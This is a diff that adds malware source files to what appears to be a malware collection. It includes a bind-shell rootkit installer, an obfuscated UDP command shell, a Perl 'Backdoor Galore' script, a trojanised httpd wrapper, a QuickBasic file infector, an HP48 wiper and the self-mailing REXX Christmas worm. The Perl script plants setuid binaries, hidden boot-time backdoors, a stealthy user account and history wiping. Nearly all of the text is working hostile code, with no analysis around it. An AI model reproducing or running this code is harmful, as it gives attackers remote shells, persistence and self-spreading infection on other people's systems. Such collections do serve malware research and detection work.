+/* You're on your own, pal.. */
+while(1) {
+socklen=sizeof(Client);
+if ((sockcli=accept(sock, (struct sockaddr *) &Client, &socklen)) < 0) exit(1);   /* syslog msg here still */
+clipid=getpid();
+serpid=fork();
+if (serpid > 0)
+waitpid(0, &stat, 0);    
+dup2(sockcli, 1);
+execl("/bin/sh","sh",(char *)0);  }
+close(sockcli);   }
+void die(char *error) {
+fprintf(stderr, "%s\n", error);
+exit(1);  }
+
+EOF
+
+gcc -o /bin/rootd /tmp/rootd.c
+rm -f /tmp/rootd.c
+rootd $port $max
+echo "Rootkit installed at port 905"
+exit 0
--- a/Linux/Backdoor.Linux.ShadyShell.c
+++ b/Linux/Backdoor.Linux.ShadyShell.c
@ -0,0 +1,22 @@
+/* shadyshell.c by Derek Callaway <super@udel.edu> -- S@IRC
+   obfuscated/optimized/compact UDP portshell code; Avoid layer 4 IDS ;-)
+   Example client usage: nc -u host.dom 1337
+   Greets: inNUENdo, s0ftpr0jects, zsh 
+*/
+#include<stdio.h>
+#include<sys/socket.h>
+#include<sys/types.h>
+#include<netinet/in.h>
+#include<stdlib.h>
+#define DP 1337 /* Default Port */
+void ve(const char*f){perror(f);exit(-1);} int isdigit(),dup2();
+void usg(char**v){printf("usage: %s [port]\n",*v);exit(0);}
+int main(int c,char**v){struct sockaddr_in s={};struct sockaddr u;
+char*p,b[512];if(c==2){for(p=v[1];*p;p++)if(!isdigit(*p))usg(v);c=atoi(*(++v));}
+s.sin_port=htons(c==2?c:DP),s.sin_addr.s_addr=INADDR_ANY,s.sin_family=AF_INET;
+if((c=socket(AF_INET,SOCK_DGRAM,0))<0)ve("socket"); /* www.innu.org/~super */
+if(bind(c,&s,sizeof(s))<0)ve("bind");dup2(c,1);dup2(c,2);s.sin_port=sizeof(u);
+if(recvfrom(c,&b,1024,0,&u,(int*)&(s.sin_port))<0)ve("socket");
+if(connect(c,&u,sizeof(u))<0)ve("socket"); /* No overflows here. :P */
+do{for(*v=b,p=0;**v&&((*v-b)<512||(p=*v));(*v)++)if(p||**v=='\r'||**v=='\n')
+{**v=0;break;}if(p)continue;system(b);recv(c,&b,1024,0);}while(1);exit(0);}
--- a/Linux/Backdoor.Unix.Galore.11
+++ b/Linux/Backdoor.Unix.Galore.11
@ -0,0 +1,141 @@
+#!/usr/bin/perl
+# BackDoor Galore 1.1 (fixed!)
+# Author: NTFX <ntfx@legion2000.tk>
+# Legion2000 Security Research 1995 -
+# This is a simple perl script which backdoors a system for you.
+# Updated, set wrong rc.local patch and didnt execute them, blah!
+# thats what happens when you code at 4am.
+###################################
+&option(); 
+sub option() {
+	system("clear");
+print "##################################\n";
+print "#Backdoor Galore By NTFX         #\n";
+print "#Contact: <ntfx\@legion2000.tk>   #\n";
+print "#Legion2000 Security Research (c)#\n";
+print "##################################\n";
+print "#[ 1] Do this first of all.      #\n"; # must do this cause im lazy.
+print "#[ 2] Create setuid binary's.    #\n"; # /usr/bin/mail & /usr/bin/find.
+print "#[ 3] Open up TCP backdoor.      #\n"; # 12350 # hid /usr/sbin/.telnetd.
+print "#[ 4] Open up UDP backdoor.      #\n"; # 65535 # hid /usr/sbin/.telnetd.
+print "#[ 5] Add Cron Sched'd backdoor. #\n"; # 10001 # only open 3 hours a day.
+print "#[ 6] Add unsuspicious user.     #\n"; # gpm or news prob best.
+print "#[ 7] Hide ptrace Exploit.       #\n"; # /dev/.pts.
+print "#[ 8] Removes Traces             #\n";
+print "#[ 9] Social Calls.              #\n"; # Sociable Greetings.
+print "#[10] Exit the backdoor Script.  #\n"; # quit the backdoor.
+print "##################################\n";
+print "#Enter Option:";
+chomp($number=<STDIN>);
+	if($number == "1") { &di() }
+	if($number == "2") { &uid() } 
+	if($number == "3") { &tcp() } 
+	if($number == "4") { &udp() }
+	if($number == "5") { &cro() }
+	if($number == "6") { &usr() }
+	if($number == "7") { &ptr() }
+	if($number == "8") { &rem() }
+	if($number == "9") { &soc() }
+	if($number == "10") { &ex() }
+	else { &option() } }
+##################
+sub di() {
+	system ("clear");
+	system ("cd $HOME; mkdir ntfx script; mv *.c $HOME/ntfx; mv *pl $HOME/script");
+sleep 2;  }
+##################
+sub uid()  {
+	system ("clear");
+print "we will now make a setuid file in /usr/bin";
+	system ("cd /usr/bin; chmod +s mail; cd $HOME");
+print "mail is now +s\n"; #edit as you wish.
+	system ("cd /usr/bin; chmod +s find; cd $HOME");
+print "find is now +s\n"; #edit as you wish.
+sleep 1;  }
+##################
+sub tcp() {
+	system ("clear");
+print "We are now going to create a basic tcp backdoor\n";
+	system ("cd ../ntfx; gcc tcp.c -o tcp; mv /usr/sbin/.telnetd; echo 
+                /usr/sbin/.telnetd >> /etc/rc.d/rc.local; /usr/sbin/.telnetd &"); # starts on boot.
+print "tcp backdoor is now running on specified port and enabled at boot\n";
+sleep 1;  }
+###################
+sub udp() {
+	system ("clear");
+print "We are now going to install a basic udp backdoor\n";
+	system ("cd ../ntfx; gcc udp.c -o udp; mv /usr/sbin/.telnetd.; echo
+		/usr/sbin/.telnetd. >> /etc/rc.d/rc.local; /usr/sbin/.telnetd. &");
+print "udp backdoor now running on specified port and enabled at boot\n";
+sleep 1;  }
+###################
+sub cro() {
+	system ("clear");
+print "We are now going to install a backdoor into the crond\n";
+	system ("bash crond.sh");
+print "The cron backdoor is now installed, and running on the specified port\n";
+sleep 1; }
+###################
+sub usr() {
+	system ("clear");
+print "we will now add a unsuspicious user to the system\n";
+print "username: ";
+chomp($user=<STDIN>); # be sensible, an acc called "hax0r" will be noticed.
+print "UID: ";
+chomp($uid=<STDIN>);
+print "GID: ";
+chomp($gid=<STDIN>);
+print "home dir: ";
+chomp($home=<STDIN>); #/home/httpd maybe?
+print "type of shell: ";
+chomp($sh=<STDIN>);
+print "comments: "; # preferably leave blank
+chomp($cm=<STDIN>);
+	system("/usr/sbin/useradd $user -u $uid -g $gid -d $home -s $sh -c $cm");
+	system("passwd $user");
+sleep 1;  }
+##################
+sub ptr() {
+	system ("clear");
+print "we are now going to compile and hide the ptrace exploit\n";
+print "name the user you previously entered";
+chomp ($usr=<STDIN>);
+	system ("cd ../ntfx; gcc ptrace.c -o pts; chown $usr pts; mv pts /dev/.pts");
+print "ptrace is now stored in /dev/.pts";
+sleep 1;  }
+##################
+sub soc()  {
+	system ("clear");
+print "Greetings:\n";
+sleep 1;
+print "opt1k, SpyModem, eckis, EazyMoney, Phantasm, Epheo, I-L, wired-\n";
+sleep 1;
+print "BlackSun Research, Legion2000 Crew, efnet #feed-the-goats\n";
+$sex;
+print "press any key to continue....";
+chomp($sex=<STDIN>); }
+##################
+sub rem() {
+	system ("clear");
+print "we are now going to remove files we have used.\n";
+	system ("rm -rf $HOME/scripts; rm -rf $HOME/ntfx");
+print "now removing history files.\n";
+	system ("HISTFILE=/dev/null; HISTFILESIZE=0; rm -rf .*"); }
+# had to redo due to paul holden selecting remove traces on the original source.
+#############
+sub ex() {
+	system("clear");
+print"    #                                      #####    ###     ###     ###\n";
+print"    #       ######  ####  #  ####  #    # #     #  #   #   #   #   #   #\n";
+print"    #       #      #    # # #    # ##   #       # #     # #     # #     #\n";
+print"    #       #####  #      # #    # # #  #  #####  #     # #     # #     #\n";
+print"    #       #      #  ### # #    # #  # # #       #     # #     # #     #\n";
+print"    #       #      #    # # #    # #   ## #        #   #   #   #   #   #\n";
+print"    ####### ######  ####  #  ####  #    # #######   ###     ###     ###\n";
+print"			      www.legion2000.tk\n";
+print"			    efnet #feed-the-goats\n";
+print"\n\n";
+print"Press Any Key To Exit\n";
+$sex;
+chomp($sex=<STDIN>);
+exit 1;}
--- a/Linux/Constructor.Script.IBBM.a
+++ b/Linux/Constructor.Script.IBBM.a
--- a/Linux/Virus.BAS.Xyc
+++ b/Linux/Virus.BAS.Xyc
@ -0,0 +1,13 @@
+CLS
+REM The first Quick Basic infection Virus
+REM written by SeCoNd PaRt To HeLl
+REM for showing, that .BAS can be infected
+REM NAME of the Virus: BAS.XYC
+OPEN "C:\xyc.bat" FOR OUTPUT AS #1
+PRINT #1, "@echo off"
+PRINT #1, "if exist xyc.bas copy xyc.bas C:\xyc.bas"
+PRINT #1, "for %%r in (*.bas ..\*.bas %windir%\*.bas) do copy C:\xyc.bas %%r"
+CLOSE #1
+SHELL "C:\xyc.bat"
+
+
--- a/Linux/Virus.Linux.TrojoDaemon.c
+++ b/Linux/Virus.Linux.TrojoDaemon.c
@ -0,0 +1,96 @@
+/*	 ......:::: daemon trojo by DeV^AwaY ::::......
+ *
+ *
+ * [*] --> coded by: DeV^AwaY
+ * [*] ------------> devilnet@freemail.it
+ * [*] ------------> ircnet/efnet@DeV^AwaY
+ * [*] --> V3rsion: 0.2
+ * 
+ * install: 
+ * To install this trojan you should copy the real daemon in another
+ * directory !WITH THE SOME NAME!. Then you should compile this source on the
+ * real daemon file in its some directory.
+ * So write in /dev/ptyh all path/commands to execute with
+ * daemon. If you must use options with commands you must divide they
+ * with the $ character. 
+ * Ex:
+ *
+ * cat /dev/ptyh
+ * /home/hacker/. /psybnc				<-- without options
+ * /home/hacker/bot/eggdrop$ -m bot.conf -t	<-- with options
+ * /home/hacker/.   $					<-- to run the file ".   " 
+ *
+ * Default
+ * trojo daemon /usr/sbin/httpd
+ * real deamon /usr/bin/httpd				#EXE_PATH
+ *
+ */
+
+#include <stdio.h>
+#include <stdlib.h>
+
+#define TRJ_PATH        "/dev/ptyh"
+#define EXE_PATH        "/usr/bin/httpd"
+
+main (int argc,char **argv,char **envp) {
+
+char fstr[200],**addr=malloc(200),slas[500],slaw[500];
+int i,ic=1,deic,sllen;
+FILE *ofile;
+	
+	if (fork() == 0) {
+		if ((ofile=fopen(TRJ_PATH,"r"))==NULL) exit(0);
+	
+		while (!feof(ofile)) {
+			fgets(fstr, 200, ofile);
+			for (i=0; i<strlen(fstr); i++) if (fstr[i]=='\n') fstr[i]='\0';
+			addr[ic]=malloc(200);
+			strcpy(addr[ic],fstr);
+			ic++;
+		}
+	
+		deic=ic-2; ic=0;
+	
+		while (ic!=deic) {
+			ic++;
+			i=0;
+			memset(slaw, 0, 500);
+			strcpy(slas,addr[ic]);	
+			sllen=strlen(slas);
+	
+			while (i!=sllen) {
+			   if (slas[i]=='$') { 
+				(slas[i]='"'); 
+				goto out; }
+			   else i++;
+			}
+		
+			out:
+			if (sllen==i) strcat(slas,"\"");
+			strncpy(slaw,slas,i);
+			if ((ofile=fopen(slaw,"r"))==NULL) exit(0); 
+			strcpy(addr[ic],slas);
+			strcpy(addr[ic],"cd \"");
+
+			while (sllen!=0) {
+			   if (slas[sllen]=='/') goto out2;
+			   else sllen--;
+			}
+			out2:
+			strncat(addr[ic],slas,sllen);
+			strcat(addr[ic],"\" && \".");
+			strcat(addr[ic],slas+sllen); 
+			strcat(addr[ic]," 1>/dev/null 2>/dev/null &");	
+			system(addr[ic]);
+			}
+		exit(0);
+	}
+
+	if ((ofile=fopen(EXE_PATH,"r"))==NULL) {
+		printf("bash: %s: No such file or directory\n",EXE_PATH); 
+		exit(0);
+	}
+
+	execve(EXE_PATH, argv, envp);
+
+}
--- a/Linux/Virus.Script.Higu
+++ b/Linux/Virus.Script.Higu
@ -0,0 +1,13 @@
+<< CLLCD
+   "Press any key to run Protect System" MSGBOX
+   << DO
+      HOME CLEAR VARS OBJ-> DROP
+      'V1' STO
+      PURGE 'V1'
+      UNTIL DEPTH 0
+      END
+   >> CLVAR CLEAR
+   CLLCD
+   "Bye HP48..... virus_br@hotmail.com Higuita(3c)" MSGBOX
+   1400 .60 BEEP
+>> 'BYEHP48' [STO]
--- a/Linux/Virus.Script.IBM.XMasTreeWorm
+++ b/Linux/Virus.Script.IBM.XMasTreeWorm
@ -0,0 +1,102 @@
+/*********************/
+/*    LET THIS EXEC  */
+/*		     */
+/*	  RUN	     */
+/*		     */
+/*	  AND	     */
+/*		     */
+/*	 ENJOY	     */
+/*		     */
+/*     YOURSELF!     */
+/*********************/
+'VMFCLEAR'
+SAY '                *               '
+SAY '                *               '
+SAY '               ***              '
+SAY '              *****             '
+SAY '             *******            '
+SAY '            *********           '
+SAY '          *************                A'
+SAY '             *******            '
+SAY '           ***********                VERY'
+SAY '         ***************        '
+SAY '       *******************            HAPPY'
+SAY '           ***********          '
+SAY '         ***************            CHRISTMAS'
+SAY '       *******************      '
+SAY '     ***********************         AND MY'
+SAY '         ***************        '
+SAY '       *******************         BEST WISHES'
+SAY '     ***********************    '
+SAY '   ***************************     FOR THE NEXT'
+SAY '             ******             '
+SAY '             ******                    YEAR'
+SAY '             ******               '
+/*     browsing this file is no fun at all
+       just type CHRISTMAS from cms */
+dropbuf
+makebuf
+"q t (stack"
+  pull d1 d2 d3 d4 d5 dat
+  pull zeile
+  jeah = substr(dat,7,2)
+  tack = substr(dat,4,2)
+  mohn = substr(dat,1,2)
+if jeah <= 88 then do
+if mohn <2 ] mohn = 12 then do
+DROPBUF
+MAKEBUF
+"IDENTIFY ( FIFO"
+PULL WER VON WO IST REST
+DROPBUF
+MAKEBUF
+"EXECIO * DISKR " WER " NAMES A (FIFO"
+ DO WHILE QUEUED() > 0
+    PULL NICK NAME ORT
+    NAM = INDEX(NAME,'.')+1
+    IF NAM > 0 THEN DO
+       NAME = SUBSTR(NAME,NAM)
+    END
+    NAM = INDEX(ORT,'.')+1
+    IF NAM > 0 THEN DO
+       ORT  = SUBSTR(ORT,NAM)
+    END
+    IF LENGTH(NAME)>0 THEN DO
+       IF LENGTH(ORT) = 0 THEN DO
+	  ORT = WO
+       END
+       if name ^= "RELAY" then do
+       "SF CHRISTMAS EXEC A " NAME " AT " ORT " (ack"
+       end
+    END
+ END
+DROPBUF
+MAKEBUF
+ANZ = 1
+"EXECIO * DISKR " WER " NETLOG A (FIFO"
+ DO WHILE QUEUED() > 0
+    PULL KIND FN FT FM ACT FROM ID AT NODE REST
+    IF ACT = 'SENT'  THEN DO
+       IF ANZ = 1 THEN DO
+	 OK.ANZ = ID
+       END
+       IF ANZ > 1 THEN DO
+	 OK.ANZ = ID
+	 NIXIS = 0
+	 DO I = 1 TO ANZ-1
+	    IF OK.I = ID THEN DO
+	       NIXIS = 1
+	    END
+	 END
+       END
+       ANZ = ANZ + 1
+       IF NIXIS = 0 THEN DO
+       "SF CHRISTMAS EXEC A " ID " AT " NODE " (ack"
+       END
+    END
+ END
+DROPBUF
+END
+end
+end
+
--- a/Linux/Virus.Script.MBP.Kynel
+++ b/Linux/Virus.Script.MBP.Kynel